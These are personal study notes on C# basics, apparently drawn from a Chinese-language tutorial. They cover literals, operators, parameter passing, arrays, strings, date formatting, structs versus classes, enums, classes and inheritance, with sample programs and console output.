The original page claims 314159E-5L is legal, but in my tests it is not; only 314159E-5 is.

Character constants

    namespace EscapeChar
    {
    class Program
    {
    static void Main(string[] args)
    {
    Console.WriteLine("Hello\tWorld\n\n");
    Console.ReadLine();
    }
    }
    }

…and the like.

String constants

    string a = "hello, world";  // hello, world
    string b = @"hello, world"; // hello, world
    string c = "hello \t world"; // hello world
    string d = @"hello \t world"; // hello \t world
    string e = "Joe said \"Hello\" to me"; // Joe said "Hello" to me
    string f = @"Joe said ""Hello"" to me"; // Joe said "Hello" to me
    string g = "\\\\server\\share\\file.txt"; // \\server\share\file.txt
    string h = @"\\server\share\file.txt"; // \\server\share\file.txt
    string i = "one\r\ntwo\r\nthree";
    string j = @"one
    two
    three";

Carriage return and newline are two related but distinct concepts, usually used together to control the layout and formatting of text for display or storage.

1. Carriage return (\r)
  • Carriage return is a control character that moves the cursor to the beginning of the current line without advancing to the next line. On early typewriters and teletypes, the carriage-return operation moved the print head back to the left edge of the paper (the "return" position) so the machine could start printing a new line from the left.
  • In computing, carriage return is the ASCII character with value 13 (0x0D).
2. Newline (\n)
  • Newline is another control character, indicating that a new line should begin at the current position. It typically moves the cursor to the beginning of the next line so text continues from there.
  • In computing, newline is the ASCII character with value 10 (0x0A).

Line endings differ between modern operating systems: Windows uses \r\n as its standard line ending, while Unix, Linux, and macOS typically use just \n. This difference can cause formatting problems when handling text files across platforms.

In summary:

• Carriage return (\r): moves the cursor to the beginning of the current line.
• Newline (\n): moves the cursor to the beginning of the next line; combined with carriage return it produces the intended layout and formatting of text.

Defining constants

Constants are defined with the const keyword.
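A couple of const declarations for illustration:

class Circle
{
public const double Pi = 3.14159;   // compile-time constant
public const string Unit = "cm";

public static double Area(double r) => Pi * r * r;
}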

C# Operators

Mostly the same as C/C++; noting a few I had not met before.

is checks whether an object is of a given type.

    using System;

    namespace VariableDefinition
    {
    class Program
    {
    static void Main(string[] args)
    {
    dynamic a = 3.14;
    Console.WriteLine(a is float);
    Console.ReadLine();
    }
    }
    }
    False

as performs a cast that returns null instead of throwing an exception when the conversion fails.

    using System;

    namespace AsOperatorExample
    {
    class Program
    {
    static void Main(string[] args)
    {
    object obj = "This is a string";

    // Using 'as' operator to cast obj to string
    string str = obj as string;

    if (str != null)
    {
    Console.WriteLine("The object was successfully cast to a string.");
    Console.WriteLine(str);
    }
    else
    {
    Console.WriteLine("The object could not be cast to a string.");
    }

    // Attempting to cast obj to an incompatible type
    obj = 123;
    str = obj as string;

    if (str == null)
    {
    Console.WriteLine("The object could not be cast to a string because it is not a compatible type.");
    }
    }
    }
    }
    The object was successfully cast to a string.
    This is a string
    The object could not be cast to a string because it is not a compatible type.

typeof() returns the Type of a class.

    using System;

    class Program
    {
    static void Main(string[] args)
    {
    Type type = typeof(string);
    Console.WriteLine(type.FullName);
    Console.ReadKey();
    }
    }
    System.String

C# Conditionals

Same as C/C++.

C# Loops

Defining an array in C#:

int[] fibarray = new int[] { 0, 1, 1, 2, 3, 5, 8, 13 };

Defining a list in C#:

// create a list of strings
List<string> myStrings = new List<string>();

// add some string elements to the list
myStrings.Add("Google");
myStrings.Add("Runoob");
myStrings.Add("Taobao");

Loop syntax is mostly the same as in C/C++. Let's try foreach, which I had never been very familiar with:

    class ForEachTest
    {
    static void Main(string[] args)
    {
    int[] fibarray = new int[] { 0, 1, 1, 2, 3, 5, 8, 13 };
    foreach (int element in fibarray)
    {
    System.Console.WriteLine(element);
    }
    System.Console.WriteLine();

// index-based loop similar to foreach
    for (int i = 0; i < fibarray.Length; i++)
    {
    System.Console.WriteLine(fibarray[i]);
    }
    System.Console.WriteLine();

// counter for the elements in the collection
    int count = 0;
    foreach (int element in fibarray)
    {
    count += 1;
    System.Console.WriteLine("Element #{0}: {1}", count, element);
    }
    System.Console.WriteLine("Number of elements in the array: {0}", count);
    }
    }
    0
    1
    1
    2
    3
    5
    8
    13

    0
    1
    1
    2
    3
    5
    8
    13

    Element #1: 0
    Element #2: 1
    Element #3: 1
    Element #4: 2
    Element #5: 3
    Element #6: 5
    Element #7: 8
    Element #8: 13
    Number of elements in the array: 8

C# Encapsulation

An access modifier defines the scope and visibility of a class member. C# supports the following access modifiers:

• public: accessible to all objects;
• private: accessible only inside the object itself;
• protected: accessible to the class and its derived classes
  • this helps implement inheritance
• internal: accessible to objects within the same assembly;
• protected internal: access limited to the current assembly or to types derived from the containing class.

An analogy: a man A is the base class; he has a son B (a subclass of A), a wife C (inside the object but not a subclass), and an illegitimate son D (note: D does not live in his household, i.e. a subclass but not inside the object).

If we attach modifiers to A's affairs (see the sketch after this list):

• public: the whole world knows; fully public

• protected: A, B, and D know (A and all his sons; wife C does not)

• private: only A knows (privacy? secrets?)

• internal: A, B, and C know (everyone in A's household; illegitimate son D does not)

• protected internal: A, B, C, and D all know; nobody else does
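A minimal sketch matching the analogy (member names are illustrative only):

class Father
{
public int PublicEvent;            // everyone
protected int ProtectedEvent;      // Father and all subclasses (B, D)
private int PrivateEvent;          // Father only
internal int InternalEvent;        // same assembly (the household: B, C)
protected internal int MixedEvent; // same assembly or any subclass (B, C, D)
}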

C# Methods

    <Access Specifier> <Return Type> <Method Name>(Parameter List)
    {
    Method Body
    }
• Access Specifier: the access modifier; it determines the visibility of the variable or method to other classes.
• Return type: a method may return a value; this is the data type of that value. If the method returns nothing, the return type is void.
• Method name: a unique, case-sensitive identifier; it cannot be the same as other identifiers declared in the class.
• Parameter list: enclosed in parentheses; parameters pass data to and from the method. The list specifies the types, order, and number of parameters. Parameters are optional; a method may take none.
• Method body: the set of instructions needed to complete the task.

Passing parameters by value

This is the default way of passing parameters. When a method is called, a new storage location is created for each value parameter.

The actual argument's value is copied into the formal parameter; the two use different memory locations. Changes to the formal parameter therefore do not affect the argument, keeping its data safe. The following example demonstrates this:

    using System;
    namespace CalculatorApplication
    {
    class NumberManipulator
    {
    public void swap(int x, int y)
    {
    int temp;

    temp = x; /* 保存 x 的值 */
    x = y; /* 把 y 赋值给 x */
    y = temp; /* 把 temp 赋值给 y */
    }

    static void Main(string[] args)
    {
    NumberManipulator n = new NumberManipulator();
    /* 局部变量定义 */
    int a = 100;
    int b = 200;

    Console.WriteLine("在交换之前,a 的值: {0}", a);
    Console.WriteLine("在交换之前,b 的值: {0}", b);

    /* 调用函数来交换值 */
    n.swap(a, b);

    Console.WriteLine("在交换之后,a 的值: {0}", a);
    Console.WriteLine("在交换之后,b 的值: {0}", b);

    Console.ReadLine();
    }
    }
    }

When the above code is compiled and executed, it produces the following result:

    在交换之前,a 的值: 100
    在交换之前,b 的值: 200
    在交换之后,a 的值: 100
    在交换之后,b 的值: 200

Swapping a and b failed.

Passing parameters by reference

A reference parameter is a reference to a variable's memory location. Unlike value parameters, passing by reference creates no new storage location; the reference parameter shares the same memory location as the actual argument supplied to the method.

Similar to pointers in C/C++.

In C#, reference parameters are declared with the ref keyword. The following example demonstrates this:

    using System;
    namespace CalculatorApplication
    {
    class NumberManipulator
    {
    public void swap(ref int x, ref int y)
    {
    int temp;

    temp = x; /* 保存 x 的值 */
    x = y; /* 把 y 赋值给 x */
    y = temp; /* 把 temp 赋值给 y */
    }

    static void Main(string[] args)
    {
    NumberManipulator n = new NumberManipulator();
    /* 局部变量定义 */
    int a = 100;
    int b = 200;

    Console.WriteLine("在交换之前,a 的值: {0}", a);
    Console.WriteLine("在交换之前,b 的值: {0}", b);

    /* 调用函数来交换值 */
    n.swap(ref a, ref b);

    Console.WriteLine("在交换之后,a 的值: {0}", a);
    Console.WriteLine("在交换之后,b 的值: {0}", b);

    Console.ReadLine();

    }
    }
    }
    在交换之前,a 的值:100
    在交换之前,b 的值:200
    在交换之后,a 的值:200
    在交换之后,b 的值:100

Passing parameters by output

A return statement can return only one value from a function, but output parameters let you return multiple values. An output parameter has the method's output assigned to it; in other respects it resembles a reference parameter.

    using System;

    namespace CalculatorApplication
    {
    class NumberManipulator
    {
    public void getValue(out int x)
    {
    int temp = 5;
    x = temp;
    }

    static void Main(string[] args)
    {
    NumberManipulator n = new NumberManipulator();
    /* 局部变量定义 */
    int a = 100;

    Console.WriteLine("在方法调用之前,a 的值: {0}", a);

    /* 调用函数来获取值 */
    n.getValue(out a);

    Console.WriteLine("在方法调用之后,a 的值: {0}", a);
    Console.ReadLine();

    }
    }
    }
    在方法调用之前,a 的值: 100
    在方法调用之后,a 的值: 5

C# Nullable Types

C# nullable types (Nullable)

The single question mark ? allows null to be assigned to data types such as int, double, and bool that normally cannot be null; it marks the type as Nullable.

    using System;
    namespace CalculatorApplication
    {
    class NullablesAtShow
    {
    static void Main(string[] args)
    {
    int? num1 = null;
    int? num2 = 45;
    double? num3 = new double?();
    double? num4 = 3.14157;

    bool? boolval = new bool?();

    // 显示值

    Console.WriteLine("显示可空类型的值: {0}, {1}, {2}, {3}",
    num1, num2, num3, num4);
    Console.WriteLine("一个可空的布尔值: {0}", boolval);
    Console.ReadLine();

    }
    }
    }
    显示可空类型的值: , 45, , 3.14157
    一个可空的布尔值:

Null coalescing operator (??)

The null coalescing operator supplies a default value for nullable and reference types: it defines a preset value to use in case the nullable value is null.

    using System;
    namespace CalculatorApplication
    {
    class NullablesAtShow
    {

    static void Main(string[] args)
    {

    double? num1 = null;
    double? num2 = 3.14157;
    double num3;
    num3 = num1 ?? 5.34; // num1 如果为空值则返回 5.34
    Console.WriteLine("num3 的值: {0}", num3);
    num3 = num2 ?? 5.34;
    Console.WriteLine("num3 的值: {0}", num3);
    Console.ReadLine();

    }
    }
    }
    num3 的值: 5.34
    num3 的值: 3.14157

?? can be understood as a simplified form of the ternary operator:

num3 = num1 ?? 5.34;
num3 = (num1 == null) ? 5.34 : num1.Value;

C# Arrays

    using System;
    namespace ArrayApplication
    {
    class MyArray
    {
    static void Main(string[] args)
    {
    int[] n = new int[10]; /* n 是一个带有 10 个整数的数组 */
    int i, j;


    /* 初始化数组 n 中的元素 */
    for (i = 0; i < 10; i++)
    {
    n[i] = i + 100;
    }

    /* 输出每个数组元素的值 */
    for (j = 0; j < 10; j++)
    {
    Console.WriteLine("Element[{0}] = {1}", j, n[j]);
    }
    Console.ReadKey();
    }
    }
    }

Two-dimensional arrays:

    using System;

    namespace TwoDimensionalArrayExample
    {
    class Program
    {
    static void Main(string[] args)
    {
    // 定义一个3行4列的二维数组
    int[,] array = new int[3, 4];

    // 使用嵌套循环来初始化数组元素
    for (int i = 0; i < 3; i++)
    {
    for (int j = 0; j < 4; j++)
    {
    array[i, j] = i * j; // 举例:初始化为行索引乘以列索引
    }
    }

    /* 也可直接初始化:
    int[,] array =
    {
    { 1, 2, 3, 4 },
    { 5, 6, 7, 8 },
    { 9, 10, 11, 12 }
    };
    */

    // 打印数组元素
    for (int i = 0; i < 3; i++)
    {
    for (int j = 0; j < 4; j++)
    {
    Console.Write(array[i, j] + "\t");
    }
    Console.WriteLine();
    }
    }
    }
    }

C# Multidimensional Arrays

The concept of a two-dimensional array in C# differs from that in C/C++, Java, etc.; a C# two-dimensional array is more like a matrix:

int [,] a = new int [3,4] {
{0, 1, 2, 3} , /* initialize row 0 */
{4, 5, 6, 7} , /* initialize row 1 */
{8, 9, 10, 11} /* initialize row 2 */
};

Coming to C# from another language, it is easy to confuse this with jagged arrays.

C# Jagged Arrays

In C#, multidimensional arrays and jagged arrays are two different array forms with several important differences:

1. Memory layout
  • Multidimensional arrays: stored contiguously in memory. For example, int[,] arr = new int[3, 4]; allocates one contiguous block holding 3 * 4 = 12 integers.
  • Jagged arrays: really arrays of arrays. Each element is an independent one-dimensional array; these subarrays are not necessarily contiguous in memory, and each may have a different length. For example, with int[][] jaggedArray = new int[3][]; each element of jaggedArray is an int[] that can have its own length.
2. Flexibility
  • Multidimensional arrays: every dimension's size is fixed at declaration and cannot change dynamically. With int[,] arr = new int[3, 4]; arr has three rows and four columns, and neither count can change.
  • Jagged arrays: after declaration, each subarray's length can be set independently, so the sizes may differ. This makes jagged arrays more flexible and convenient for irregular data structures.
3. Access
  • Multidimensional arrays: elements are accessed with comma-separated indices for each dimension, e.g. int[,] arr = new int[3, 4]; int x = arr[1, 2]; reads the element in row 2, column 3.
  • Jagged arrays: the first index selects a subarray, the second indexes into it, e.g. int[][] jaggedArray = new int[3][]; int y = jaggedArray[1][2]; reads the third element of the second subarray.
4. Use cases and performance
  • Multidimensional arrays: suited to matrices and similar 2D data structures; fast access and a contiguous memory layout favor performance.
  • Jagged arrays: suited to irregular or dynamically sized data sets, since each subarray can be resized as needed.

In short, multidimensional and jagged arrays differ clearly in memory layout, flexibility, and access; which to choose depends on the application and the data structure.

• A jagged array is an array of arrays

• A jagged array is a one-dimensional array

You can declare a jagged array scores of int values like this:

    int [][] scores;

Declaring an array does not create it in memory. To create the array above:

    int[][] scores = new int[5][];
    for (int i = 0; i < scores.Length; i++)
    {
    scores[i] = new int[4];
    }

You can initialize a jagged array like this:

    int[][] scores = new int[2][]{new int[]{92,93,94},new int[]{85,66,87,88}};

C# Passing Arrays to Functions

In C#, you can pass an array as a function argument. Passing the array's name without an index passes a pointer to the array.

The following example shows how to pass an array to a function:

    using System;

    namespace ArrayApplication
    {
    class MyArray
    {
    double getAverage(int[] arr, int size)
    {
    int i;
    double avg;
    int sum = 0;

    for (i = 0; i < size; ++i)
    {
    sum += arr[i];
    }

    avg = (double)sum / size;
    return avg;
    }
    static void Main(string[] args)
    {
    MyArray app = new MyArray();
    /* 一个带有 5 个元素的 int 数组 */
    int [] balance = new int[]{1000, 2, 3, 17, 50};
    double avg;

    /* 传递数组的指针作为参数 */
    avg = app.getAverage(balance, 5 ) ;

    /* 输出返回值 */
    Console.WriteLine( "平均值是: {0} ", avg );
    Console.ReadKey();
    }
    }
    }

C# Strings

Creating String objects

In C#, you can represent a string with a character array, but the more common practice is to declare a string variable with the string keyword, an alias for the System.String class.

You can create a string object in any of the following ways:

• by assigning a string literal to a String variable
• by using a String class constructor
• by using the string concatenation operator (+)
• by retrieving a property or calling a method that returns a string
• by calling a formatting method to convert a value or object to its string representation
    using System;

    namespace StringApplication
    {
    class Program
    {
    static void Main(string[] args)
    {
    // 字符串,字符串连接
    string fname, lname;
    fname = "Rowan";
    lname = "Atkinson";

    string fullname = fname + lname;
    Console.WriteLine("Full Name: {0}", fullname);

    // 通过使用 string 构造函数
    char[] letters = { 'H', 'e', 'l', 'l', 'o' };
    string greetings = new string(letters);
    Console.WriteLine("Greetings: {0}", greetings);

    // 方法返回字符串
    string[] sarray = { "Hello", "From", "Tutorials", "Point" };
    string message = String.Join(" ", sarray);
    Console.WriteLine("Message: {0}", message);

    // 用于转化值的格式化方法
    DateTime waiting = new DateTime(2012, 10, 10, 17, 58, 1);
    string chat = String.Format("Message sent at {0:t} on {0:D}",
    waiting);
    Console.WriteLine("Message: {0}", chat);
    Console.ReadKey();
    }
    }
    }
    Full Name: RowanAtkinson
    Greetings: Hello
    Message: Hello From Tutorials Point
    Message: Message sent at 17:58 on 2012年10月10日

Properties of the String class

Length: gets the number of characters in the current String object.

Methods of the String class

Comparing strings

String.Compare()

    using System;

    namespace StringApplication
    {
    class StringProg
    {
    static void Main(string[] args)
    {
    string str1 = "This is test";
    string str2 = "This is test";

    if (String.Compare(str1, str2) == 0)
    {
    Console.WriteLine(str1 + " and " + str2 + " are equal.");
    }
    else
    {
    Console.WriteLine(str1 + " and " + str2 + " are not equal.");
    }

    Console.ReadKey();
    }
    }
    }
    This is test and This is test are equal.
Testing whether a string contains a string

    Contains()

    using System;

    namespace StringApplication
    {
    class StringProg
    {
    static void Main(string[] args)
    {
    string str = "This is test";
    if (str.Contains("test"))
    {
    Console.WriteLine("The sequence 'test' was found.");
    }
    Console.ReadKey();
    }
    }
    }
    The sequence 'test' was found.
Getting a substring

    Substring()

    using System;
    namespace StringApplication
    {
    class StringProg
    {
    static void Main(string[] args)
    {
    string str = "01234567890123456789";
    Console.WriteLine(str);
    string substr = str.Substring(10);
    Console.WriteLine(substr);
    Console.ReadKey();
    }
    }
    }
    01234567890123456789
    0123456789
Joining strings

    Join()

    using System;

    namespace StringApplication
    {
    class StringProg
    {
    static void Main(string[] args)
    {
    string[] starray = new string[]{"Down the way nights are dark",
    "And the sun shines daily on the mountain top",
    "I took a trip on a sailing ship",
    "And when I reached Jamaica",
    "I made a stop"};

    string str = String.Join("\n", starray);
    Console.WriteLine(str);
    Console.ReadKey() ;
    }
    }
    }
    Down the way nights are dark
    And the sun shines daily on the mountain top
    I took a trip on a sailing ship
    And when I reached Jamaica
    I made a stop

Formatting dates with string.Format

    DateTime dt = new DateTime(2017, 4, 1, 13, 16, 32, 108);
    string.Format("{0:y yy yyy yyyy}",dt); // 17 17 2017 2017
    string.Format("{0:M MM MMM MMMM}", dt);// 4 04 四月 四月
    string.Format("{0:d dd ddd dddd}", dt);// 1 01 周六 星期六
    string.Format("{0:t tt}", dt);// 下 下午
    string.Format("{0:H HH}", dt);// 13 13
    string.Format("{0:h hh}", dt);// 1 01
    string.Format("{0:m mm}", dt);// 16 16
    string.Format("{0:s ss}", dt);// 32 32
    string.Format("{0:F FF FFF FFFF FFFFF FFFFFF FFFFFFF}", dt);// 1 1 108 108 108 108 108
    string.Format("{0:f ff fff ffff fffff ffffff fffffff}", dt);// 1 10 108 1080 10800 108000 1080000
    string.Format("{0:z zz zzz}", dt);// +8 +08 +08:00

    string.Format("{0:yyyy/MM/dd HH:mm:ss.fff}",dt);  // 2017/04/01 13:16:32.108
    string.Format("{0:yyyy/MM/dd dddd}", dt);      // 2017/04/01 星期六
    string.Format("{0:yyyy/MM/dd dddd tt hh:mm}", dt); // 2017/04/01 星期六 下午 01:16
    string.Format("{0:yyyyMMdd}", dt);         // 20170401
    string.Format("{0:yyyy-MM-dd HH:mm:ss.fff}", dt); // 2017-04-01 13:16:32.108

Besides string.Format(), .ToString() can achieve the same date formatting:

    DateTime dt = new DateTime(2017,4,1,13,16,32,108);
    dt.ToString("y yy yyy yyyy"); // 17 17 2017 2017
    dt.ToString("M MM MMM MMMM"); // 4 04 四月 四月
    dt.ToString("d dd ddd dddd"); // 1 01 周六 星期六
    dt.ToString("t tt"); // 下 下午
    dt.ToString("H HH"); // 13 13
    dt.ToString("h hh"); // 1 01
    dt.ToString("m mm"); // 16 16
    dt.ToString("s ss"); // 32 32
    dt.ToString("F FF FFF FFFF FFFFF FFFFFF FFFFFFF"); // 1 1 108 108 108 108 108
    dt.ToString("f ff fff ffff fffff ffffff fffffff"); // 1 10 108 1080 10800 108000 1080000
    dt.ToString("z zz zzz"); // +8 +08 +08:00

    dt.ToString("yyyy/MM/dd HH:mm:ss.fff"); // 2017/04/01 13:16:32.108
    dt.ToString("yyyy/MM/dd dddd"); // 2017/04/01 星期六
    dt.ToString("yyyy/MM/dd dddd tt hh:mm"); // 2017/04/01 星期六 下午 01:16
    dt.ToString("yyyyMMdd"); // 20170401
    dt.ToString("yyyy-MM-dd HH:mm:ss.fff");  // 2017-04-01 13:16:32.108

C# Structs

In C#, a struct is a value type used to organize and store related data.

A struct is a value-type data structure that lets a single variable store related data of various types.

    using System;
    using System.Text;

    struct Books
    {
    public string title;
    public string author;
    public string subject;
    public int book_id;
    };

    public class testStructure
    {
    public static void Main(string[] args)
    {
    /* 声明 Book1,类型为 Books */
    Books Book1;
    /* 声明 Book2,类型为 Books */
    Books Book2;

    /* book 1 详述 */
    Book1.title = "C Programming";
    Book1.author = "Nuha Ali";
    Book1.subject = "C Programming Tutorial";
    Book1.book_id = 6495407;

    /* book 2 详述 */
    Book2.title = "Telecom Billing";
    Book2.author = "Zara Ali";
    Book2.subject = "Telecom Billing Tutorial";
    Book2.book_id = 6495700;

    /* 打印 Book1 信息 */
    Console.WriteLine("Book 1 title : {0}", Book1.title);
    Console.WriteLine("Book 1 author : {0}", Book1.author);
    Console.WriteLine("Book 1 subject : {0}", Book1.subject);
    Console.WriteLine("Book 1 book_id :{0}", Book1.book_id);

    /* 打印 Book2 信息 */
    Console.WriteLine("Book 2 title : {0}", Book2.title);
    Console.WriteLine("Book 2 author : {0}", Book2.author);
    Console.WriteLine("Book 2 subject : {0}", Book2.subject);
    Console.WriteLine("Book 2 book_id : {0}", Book2.book_id);

    Console.ReadKey();

    }
    }
    Book 1 title : C Programming
    Book 1 author : Nuha Ali
    Book 1 subject : C Programming Tutorial
    Book 1 book_id : 6495407
    Book 2 title : Telecom Billing
    Book 2 author : Zara Ali
    Book 2 subject : Telecom Billing Tutorial
    Book 2 book_id : 6495700

Classes vs Structs

Classes and structs involve different design and usage considerations: classes suit complex objects and behavior and support inheritance and polymorphism, while structs better suit lightweight data and value types, improving performance and avoiding reference-management overhead.

Classes and structs differ in the following basic ways:

Value type vs reference type:

• Structs are value types: they are allocated on the stack rather than the heap. When a struct instance is passed to a method or assigned to another variable, the entire struct's contents are copied.
• Classes are reference types: they are allocated on the heap. When a class instance is passed to a method or assigned to another variable, what is actually passed is the reference (memory address), not a copy of the whole object.

Inheritance and polymorphism:

• Structs cannot inherit: a struct cannot inherit from another struct or class, nor serve as the base of one.
• Classes support inheritance: classes support inheritance and polymorphism; existing classes can be extended by deriving new ones.

Default constructors:

• Structs cannot declare a parameterless constructor (prior to C# 10); any constructor a struct declares must take parameters.
• Classes can have parameterless constructors: if no constructor is provided, the compiler supplies a default parameterless one.

Assignment behavior:

• A class-typed variable stores a reference on assignment, so two variables point to the same object.
• A struct variable copies the entire struct on assignment, so each variable has its own independent copy.

Passing:

• Class objects are passed to methods by reference, so changes made to the object inside a method affect the original object.
• Struct objects are usually passed by value: a copy of the struct is passed rather than the original, so changes made inside the method do not affect the original.

Nullability:

• Structs are value types and cannot be set to null directly: null is the default for reference types, not value types. To represent a missing or invalid struct value, use Nullable<T>, also written T?.
• Classes default to nullable: class instances can be null because they are reference types.

Performance and memory allocation:

• Structs are usually lighter: being stack-allocated value types, they are typically lighter than classes and suit simple data representation.
• Classes may carry more overhead: being reference types, they can involve more memory overhead and management.

In the following example, MyStruct is a struct and MyClass is a class.

The commented-out parts show that a struct cannot have a parameterless constructor or inherit, and that copying a struct instance copies the whole struct's contents. A class, by contrast, can have a parameterless constructor, can inherit, and copying an instance copies the reference.

(A class behaves a bit like Python: if you want modifying one instance not to affect others, as with a struct, you have to define something like a .copy() method in the class yourself.)

using System;

// struct declaration
struct MyStruct
{
public int X;
public int Y;

// a struct cannot have a parameterless constructor (before C# 10)
// public MyStruct()
// {
// }

// parameterized constructor
// CS0171: field 'MyStruct.Y' must be fully assigned before control is returned to the caller. Consider updating to language version '11.0' to auto-default the field.
public MyStruct(int x, int y)
{
X = x;
Y = y;
}

// a struct cannot inherit
// struct MyDerivedStruct : MyBaseStruct
// {
// }
}

// class declaration
class MyClass
{
public int X;
public int Y;

// a class can have a parameterless constructor
public MyClass()
{
}

// parameterized constructor
public MyClass(int x, int y)
{
X = x;
Y = y;
}

// a class supports inheritance
// class MyDerivedClass : MyBaseClass
// {
// }

public MyClass ShallowCopy()
{
return (MyClass)this.MemberwiseClone();
}
}

class Program
{
static void Main()
{
// structs are value types, allocated on the stack
MyStruct structInstance1 = new MyStruct(1, 2);
MyStruct structInstance2 = structInstance1; // copies the whole struct

// classes are reference types, allocated on the heap
MyClass classInstance1 = new MyClass(3, 4);
MyClass classInstance2 = classInstance1; // copies the reference; both point to the same object
MyClass classInstance3 = classInstance1.ShallowCopy(); // shallow copy; points to a different object

// modifying a struct instance does not affect the other copy
structInstance1.X = 5;
Console.WriteLine($"Struct: {structInstance1.X}, {structInstance2.X}");

// modifying a class instance affects the other reference
classInstance1.X = 6;
Console.WriteLine($"Class: {classInstance1.X}, {classInstance2.X}, {classInstance3.X}");
}
}
    Struct: 5, 1
    Class: 6, 6, 3

C# Enums

Each symbol in an enumeration list represents an integer value, one greater than the symbol that precedes it. By default the first enumeration symbol has the value 0, though you can set the values yourself.

    using System;

    public class EnumTest
    {
    enum Day { Sun = 1, Mon = 3, Tue, Wed, Thu, Fri = 9, Sat };

    static void Main()
    {
    Console.WriteLine("Sun = {0}, Mon = {1}, Tue = {2}, Wed = {3}, Thu = {4}, Fri = {5}, Sat = {6}", (int)Day.Sun, (int)Day.Mon, (int)Day.Tue, (int)Day.Wed, (int)Day.Thu, (int)Day.Fri, (int)Day.Sat);
    }
    }
    Sun = 1, Mon = 3, Tue = 4, Wed = 5, Thu = 6, Fri = 9, Sat = 10

C# Classes

Class definitions

A class definition begins with the keyword class followed by the class name; the class body is enclosed in a pair of braces. Here is the general form of a class definition:

    <access specifier> class  class_name 
    {
    // member variables
    <access specifier> <data type> variable1;
    <access specifier> <data type> variable2;
    ...
    <access specifier> <data type> variableN;
    // member methods
    <access specifier> <return type> method1(parameter_list)
    {
    // method body
    }
    <access specifier> <return type> method2(parameter_list)
    {
    // method body
    }
    ...
    <access specifier> <return type> methodN(parameter_list)
    {
    // method body
    }
    }
• The access specifier <access specifier> defines the access rules for the class and its members. If none is given, the default is used: internal for classes and private for members.
• The data type <data type> specifies the variable's type, and the return type <return type> specifies the data type the method returns.
• To access class members, use the dot (.) operator.
• The dot operator links the name of an object with the name of a member.

Member functions and encapsulation

A member function of a class is a function whose definition or prototype appears within the class definition, just like other members. As a class member, it can operate on any object of the class and can access all members of the class for that object.

Member variables are the object's attributes (from a design standpoint), and they are kept private to implement encapsulation. These variables can only be accessed through public member functions.

Let's use these concepts to set and get the values of different class members:

    using System;
    namespace BoxApplication
    {
    class Box
    {
    private double length; // 长度
    private double breadth; // 宽度
    private double height; // 高度
    public void setLength(double len)
    {
    length = len;
    }

    public void setBreadth(double bre)
    {
    breadth = bre;
    }

    public void setHeight(double hei)
    {
    height = hei;
    }
    public double getVolume()
    {
    return length * breadth * height;
    }
    }
    class Boxtester
    {
    static void Main(string[] args)
    {
    Box Box1 = new Box(); // 声明 Box1,类型为 Box
    Box Box2 = new Box(); // 声明 Box2,类型为 Box
    double volume; // 体积


    // Box1 详述
    Box1.setLength(6.0);
    Box1.setBreadth(7.0);
    Box1.setHeight(5.0);

    // Box2 详述
    Box2.setLength(12.0);
    Box2.setBreadth(13.0);
    Box2.setHeight(10.0);

    // Box1 的体积
    volume = Box1.getVolume();
    Console.WriteLine("Box1 的体积: {0}", volume);

    // Box2 的体积
    volume = Box2.getVolume();
    Console.WriteLine("Box2 的体积: {0}", volume);

    Console.ReadKey();
    }
    }
    }
    Box1 的体积: 210
    Box2 的体积: 1560

Constructors in C#

A class constructor is a special member function of the class that executes when new objects of the class are created.

A constructor has exactly the same name as the class, and it has no return type.

A default constructor has no parameters. If you need one, a constructor can take parameters; such a constructor is called a parameterized constructor. (Just like C++/JavaScript; a short sketch follows.)
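A minimal sketch of a parameterized constructor:

using System;

class Line
{
private double length;

public Line(double len) // parameterized constructor
{
Console.WriteLine("Object is being created, length = {0}", len);
length = len;
}
}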

Destructors in C#

A class destructor is a special member function that executes when an object of the class goes out of scope (no longer needed, being destroyed).

A destructor's name is the class name prefixed with a tilde (~); it returns no value and takes no parameters.

Destructors release resources before the program ends (e.g. closing files, freeing memory). They cannot be inherited or overloaded.
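A minimal sketch of a destructor (finalizer); note that in .NET the garbage collector decides when it actually runs:

using System;

class Line
{
public Line()
{
Console.WriteLine("Object is being created");
}

~Line() // finalizer: the class name prefixed with ~, no parameters, no return type
{
Console.WriteLine("Object is being deleted");
}
}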

Static members of a C# class

We can define class members as static with the static keyword. Declaring a member static means that no matter how many objects of the class are created, only one copy of that static member exists.

The keyword static means there is only one instance of the member for the class. Static variables are handy for defining constants because their values can be retrieved by referring to the class directly, without creating an instance. Static variables can be initialized outside member functions or outside the class definition; they can also be initialized inside the class definition.

You can also declare a member function as static. Such functions can access only static variables, and they exist even before any object is created. The following example demonstrates the use of static functions:

    using System;
    namespace StaticVarApplication
    {
    class StaticVar
    {
    public static int num;
    public void count()
    {
    num++;
    }
    public static int getNum()
    {
    return num;
    }
    }
    class StaticTester
    {
    static void Main(string[] args)
    {
    StaticVar s = new StaticVar();
    s.count();
    s.count();
    s.count();
    Console.WriteLine("变量 num: {0}", StaticVar.getNum());
    Console.ReadKey();
    }
    }
    }
    变量 num: 3

C# Inheritance

Inheritance is one of the most important concepts in object-oriented programming. It allows us to define one class in terms of another, which makes creating and maintaining an application easier, encourages code reuse, and saves development time.

When creating a class, the programmer need not write entirely new data members and member functions; the new class can simply inherit the members of an existing class. The existing class is called the base class, and the new class is called the derived class.

The idea of inheritance implements the IS-A relationship. For example, a mammal IS-A animal, a dog IS-A mammal, hence a dog IS-A animal.

Base and derived classes

A class can inherit from another class; the two are called the base class (parent) and the derived class (child).

C# does not support multiple class inheritance, but it does support multiple interface inheritance: one class can implement several interfaces.

In short: a class can inherit multiple interfaces, but only one class.

The syntax for creating a derived class in C# is:

<access specifier> class <base class>
{
...
}
class <derived class> : <base class>
{
...
}

The derived class inherits the base class's members (fields, methods, properties, etc.) unless they are explicitly marked private.

A derived class can call the base class's constructors and methods via the base keyword.

Initializing the base class

    using System;
    namespace RectangleApplication
    {
    class Rectangle
    {
    // 成员变量
    protected double length;
    protected double width;
    public Rectangle(double l, double w)
    {
    length = l;
    width = w;
    }
    public double GetArea()
    {
    return length * width;
    }
    public void Display()
    {
    Console.WriteLine("长度: {0}", length);
    Console.WriteLine("宽度: {0}", width);
    Console.WriteLine("面积: {0}", GetArea());
    }
    }//end class Rectangle
    class Tabletop : Rectangle
    {
    private double cost;
    public Tabletop(double l, double w) : base(l, w)
    { }
    public double GetCost()
    {
    double cost;
    cost = GetArea() * 70;
    return cost;
    }
    public void Display()
    {
    base.Display();
    Console.WriteLine("成本: {0}", GetCost());
    }
    }
    class ExecuteRectangle
    {
    static void Main(string[] args)
    {
    Tabletop t = new Tabletop(4.5, 7.5);
    t.Display();
    Console.ReadLine();
    }
    }
    }
    长度: 4.5
    宽度: 7.5
    面积: 33.75
